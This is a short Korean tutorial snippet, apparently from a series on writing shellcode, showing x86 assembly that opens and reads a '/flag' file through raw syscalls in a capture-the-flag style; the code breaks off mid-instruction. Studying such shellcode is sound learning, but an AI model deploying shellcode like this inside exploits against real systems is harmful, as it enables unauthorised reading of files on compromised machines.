쉘코딩 하는 여러 방법 소개 시리즈 (3) 쉘코드 작성 후 바이너리로 만들고 실행할 때 /flag 읽는 쉘코드 // shellcode.S #include .intel_syntax noprefix .global _start .text _start: /* open(file='/flag', oflag=0, mode=0) */ /* push '/flag\x00' */ push 0x67 push 0x616c662f mov ebx, esp xor ecx, ecx xor edx, edx /* call open() */ push SYS_open /* 5 */ pop eax int 0x80 /* read(fd='eax', buf='esp', nbytes=32) */ mov ebx, eax mov ecx, esp push..